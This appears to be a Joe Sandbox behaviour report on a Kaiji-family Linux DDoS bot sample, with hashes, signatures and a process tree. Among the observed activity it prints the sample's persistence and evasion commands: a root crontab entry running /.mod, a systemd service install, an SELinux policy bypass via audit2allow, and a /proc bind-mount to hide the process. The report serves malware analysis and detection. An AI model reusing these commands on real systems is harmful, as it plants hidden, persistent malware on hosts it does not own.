Edit tour

Linux Analysis Report
utZX7JAuMU.elf

Overview

General Information

Sample name:	utZX7JAuMU.elf renamed because original name is a hash value
Original sample name:	13888354bd58a58d99e8394c973ca7a8.elf
Analysis ID:	1547228
MD5:	13888354bd58a58d99e8394c973ca7a8
SHA1:	ddaa889e49897d1aaed0896d21ce66fc80b11ff5
SHA256:	8a3df17080e967ed722bfb49098119bb0623afcdd87496da95e75eebc9f79f2e
Tags:	elf
Infos:

Detection

Kaiji

Score:	72
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Yara detected Kaiji

Drops files in suspicious directories

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using cron

Sample tries to set files in /etc globally writable

Creates hidden files and/or directories

Creates hidden files without content (potentially used as a mutex)

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "sleep" command used to delay execution and potentially evade sandboxes

Executes the "systemctl" command used for controlling the systemd system and service manager

Reads the 'hosts' file potentially containing internal network hosts

Sample has stripped symbol table

Sample tries to set the executable flag

Sleeps for long times indicative of sandbox evasion

Uses the "uname" system call to query kernel version information (possible evasion)

Writes shell script file to disk with an unusual file extension

Writes shell script files to disk

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1547228
Start date and time:	2024-11-02 04:03:52 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	utZX7JAuMU.elf renamed because original name is a hash value
Original Sample Name:	13888354bd58a58d99e8394c973ca7a8.elf
Detection:	MAL
Classification:	mal72.spre.troj.evad.linELF@0/58@454/0

Warnings

VT rate limit hit for: www.google.com

Runtime Messages

Command:	/tmp/utZX7JAuMU.elf
PID:	5537
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

utZX7JAuMU.elf (PID: 5537, Parent: 5465, MD5: 02e8e39e1b46472a60d128a6da84a2b8) Arguments: /tmp/utZX7JAuMU.elf

utZX7JAuMU.elf New Fork (PID: 5542, Parent: 5537)

utZX7JAuMU.elf (PID: 5542, Parent: 5537, MD5: 02e8e39e1b46472a60d128a6da84a2b8) Arguments: /tmp/utZX7JAuMU.elf

utZX7JAuMU.elf New Fork (PID: 5551, Parent: 5542)

bash (PID: 5551, Parent: 5542, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c /etc/32676&

bash New Fork (PID: 5557, Parent: 5551)

32676 (PID: 5557, Parent: 3044, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /etc/32676

32676 New Fork (PID: 5564, Parent: 5557)

sleep (PID: 5564, Parent: 5557, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60

32676 New Fork (PID: 5746, Parent: 5557)

32676 New Fork (PID: 5748, Parent: 5557)

sleep (PID: 5748, Parent: 5557, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60

32676 New Fork (PID: 5807, Parent: 5557)

32676 New Fork (PID: 5809, Parent: 5557)

sleep (PID: 5809, Parent: 5557, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60

utZX7JAuMU.elf New Fork (PID: 5558, Parent: 5542)

service (PID: 5558, Parent: 5542, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start

service New Fork (PID: 5563, Parent: 5558)

basename (PID: 5563, Parent: 5558, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 5565, Parent: 5558)

basename (PID: 5565, Parent: 5558, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 5566, Parent: 5558)

systemctl (PID: 5566, Parent: 5558, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target

service New Fork (PID: 5567, Parent: 5558)

service New Fork (PID: 5568, Parent: 5567)

systemctl (PID: 5568, Parent: 5567, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket

service New Fork (PID: 5569, Parent: 5567)

sed (PID: 5569, Parent: 5567, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

systemctl (PID: 5558, Parent: 5542, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service

utZX7JAuMU.elf New Fork (PID: 5570, Parent: 5542)

bash (PID: 5570, Parent: 5542, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaoff.service;systemctl start quotaoff.service;journalctl -xe --no-pager"

bash New Fork (PID: 5572, Parent: 5570)

systemctl (PID: 5572, Parent: 5570, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

bash New Fork (PID: 5576, Parent: 5570)

systemctl (PID: 5576, Parent: 5570, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable quotaoff.service

bash New Fork (PID: 5580, Parent: 5570)

systemctl (PID: 5580, Parent: 5570, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start quotaoff.service

bash New Fork (PID: 5593, Parent: 5570)

journalctl (PID: 5593, Parent: 5570, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: journalctl -xe --no-pager

utZX7JAuMU.elf New Fork (PID: 5598, Parent: 5542)

bash (PID: 5598, Parent: 5542, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;ausearch -c 'System.mod' --raw | audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"

bash New Fork (PID: 5603, Parent: 5598)

bash New Fork (PID: 5604, Parent: 5598)

bash New Fork (PID: 5605, Parent: 5598)

utZX7JAuMU.elf New Fork (PID: 5606, Parent: 5542)

bash (PID: 5606, Parent: 5542, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"

utZX7JAuMU.elf New Fork (PID: 5611, Parent: 5542)

renice (PID: 5611, Parent: 5542, MD5: 3686c936ed1df483498266a36871cb5b) Arguments: renice -20 5542

utZX7JAuMU.elf New Fork (PID: 5616, Parent: 5542)

mount (PID: 5616, Parent: 5542, MD5: 92b20aa8b155ecd3ba9414aa477ef565) Arguments: mount -o bind /tmp/ /proc/5542

utZX7JAuMU.elf New Fork (PID: 5643, Parent: 5542)

service (PID: 5643, Parent: 5542, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service cron start

service New Fork (PID: 5648, Parent: 5643)

basename (PID: 5648, Parent: 5643, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 5649, Parent: 5643)

basename (PID: 5649, Parent: 5643, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 5650, Parent: 5643)

systemctl (PID: 5650, Parent: 5643, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target

service New Fork (PID: 5651, Parent: 5643)

service New Fork (PID: 5652, Parent: 5651)

systemctl (PID: 5652, Parent: 5651, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket

service New Fork (PID: 5653, Parent: 5651)

sed (PID: 5653, Parent: 5651, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

systemctl (PID: 5643, Parent: 5542, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start cron.service

utZX7JAuMU.elf New Fork (PID: 5666, Parent: 5542)

systemctl (PID: 5666, Parent: 5542, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service

systemd New Fork (PID: 5574, Parent: 5573)

snapd-env-generator (PID: 5574, Parent: 5573, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 5578, Parent: 5577)

snapd-env-generator (PID: 5578, Parent: 5577, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 5581, Parent: 1)

udisksd New Fork (PID: 5631, Parent: 803)

dumpe2fs (PID: 5631, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 5665, Parent: 1)

cron (PID: 5665, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cron New Fork (PID: 5676, Parent: 5665)

cron New Fork (PID: 5684, Parent: 5676)

sh (PID: 5684, Parent: 5676, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "

sh New Fork (PID: 5685, Parent: 5684)

.mod (PID: 5685, Parent: 5684, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod

.mod New Fork (PID: 5686, Parent: 5685)

systemd New Fork (PID: 5704, Parent: 1)

cron (PID: 5704, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cron New Fork (PID: 5755, Parent: 5704)

cron New Fork (PID: 5762, Parent: 5755)

sh (PID: 5762, Parent: 5755, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "

sh New Fork (PID: 5763, Parent: 5762)

.mod (PID: 5763, Parent: 5762, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod

.mod New Fork (PID: 5764, Parent: 5763)

systemd New Fork (PID: 5784, Parent: 1)

cron (PID: 5784, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Kaiji	Surfaced in late April 2020, Intezer describes Kaiji as a DDoS malware written in Go that spreads through SSH brute force attacks. Recovered function names are an English representation of Chinese words, hinting about the origin. The name Kaiji was given by MalwareMustDie based on strings found in samples.	No Attribution	https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/ https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/ https://intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/ https://www.bitdefender.com/box/blog/iot-news/kaiji-new-strain-iot-malware-seizing-control-launching-ddos-attacks/ https://www.elastic.co/security-labs/betting-on-bots	https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiji

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
utZX7JAuMU.elf	JoeSecurity_Kaiji_1	Yara detected Kaiji	Joe Security

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: utZX7JAuMU.elf	ReversingLabs: Detection: 21%
Source: utZX7JAuMU.elf	Virustotal: Detection: 25%			Perma Link

Source: /tmp/utZX7JAuMU.elf (PID: 5542)

Reads hosts file: /etc/hosts

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ss.us-tv.top

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal72.spre.troj.evad.linELF@0/58@454/0

Source: ELF file section

Submission: utZX7JAuMU.elf

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/profile.d/bash_cfg.sh			Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/profile.d/gateway.sh			Jump to behavior

Sample tries to persist itself using cron

Source: /bin/bash (PID: 5606)

File: /etc/crontab

Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/opt.services.cfg (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/32676 (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/profile.d/bash_cfg (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/.walk	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /dev/.walk.lod	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /etc/.walk	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /dev/.old	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /dev/.img	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File: /.mod	Jump to behavior
Source: /.mod (PID: 5685)	Directory: /.mod	Jump to behavior
Source: /.mod (PID: 5763)	Directory: /.mod	Jump to behavior

Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Empty hidden file: /dev/.old	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Empty hidden file: /dev/.walk.lod	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	Empty hidden file: /dev/.img	Jump to behavior

Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/110/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/231/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/111/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/112/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/233/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/113/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/114/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/235/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/115/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/1333/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/116/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/1695/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/117/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/118/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/119/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/911/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/3875/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/914/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/10/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/917/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/11/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/12/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/13/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/14/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/15/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/16/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/17/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/18/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/19/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/1591/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/120/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/121/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/1/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/122/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/243/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/2/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/123/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/3/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/124/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/1588/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/125/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/4/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/246/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/126/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/5/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/127/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/6/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/1585/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/128/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/7/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/129/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/8/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/800/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/9/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/802/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/803/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/804/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/20/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/21/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/3407/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/22/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/23/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/24/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/25/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/26/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/27/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/28/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/29/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/1484/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/490/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/250/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/130/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/251/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/131/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/132/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/133/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/1479/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/378/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/258/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/259/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/931/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/1595/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/812/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/933/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/30/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/3419/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/35/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/3310/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/260/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/261/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/262/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/142/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/263/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/264/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/265/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/145/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/266/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/267/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/268/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/3303/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/269/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/1486/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/1806/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/3440/stat	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5542)	File opened: /proc/270/stat	Jump to behavior

Source: /tmp/utZX7JAuMU.elf (PID: 5551)	Shell command executed: /bin/bash -c /etc/32676&	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5570)	Shell command executed: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaoff.service;systemctl start quotaoff.service;journalctl -xe --no-pager"	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5598)	Shell command executed: /bin/bash -c "cd /boot;ausearch -c 'System.mod' --raw \| audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5606)	Shell command executed: /bin/bash -c "echo \"/1 * * * root /.mod \" >> /etc/crontab"	Jump to behavior
Source: /usr/sbin/cron (PID: 5684)	Shell command executed: /bin/sh -c "/.mod "	Jump to behavior
Source: /usr/sbin/cron (PID: 5762)	Shell command executed: /bin/sh -c "/.mod "	Jump to behavior

Source: /usr/sbin/service (PID: 5558)	Systemctl executable: /usr/bin/systemctl -> systemctl start crond.service	Jump to behavior
Source: /usr/sbin/service (PID: 5566)	Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target	Jump to behavior
Source: /usr/sbin/service (PID: 5568)	Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket	Jump to behavior
Source: /bin/bash (PID: 5572)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload	Jump to behavior
Source: /bin/bash (PID: 5576)	Systemctl executable: /usr/bin/systemctl -> systemctl enable quotaoff.service	Jump to behavior
Source: /bin/bash (PID: 5580)	Systemctl executable: /usr/bin/systemctl -> systemctl start quotaoff.service	Jump to behavior
Source: /usr/sbin/service (PID: 5643)	Systemctl executable: /usr/bin/systemctl -> systemctl start cron.service	Jump to behavior
Source: /usr/sbin/service (PID: 5650)	Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target	Jump to behavior
Source: /usr/sbin/service (PID: 5652)	Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket	Jump to behavior
Source: /tmp/utZX7JAuMU.elf (PID: 5666)	Systemctl executable: /usr/bin/systemctl -> systemctl start crond.service	Jump to behavior

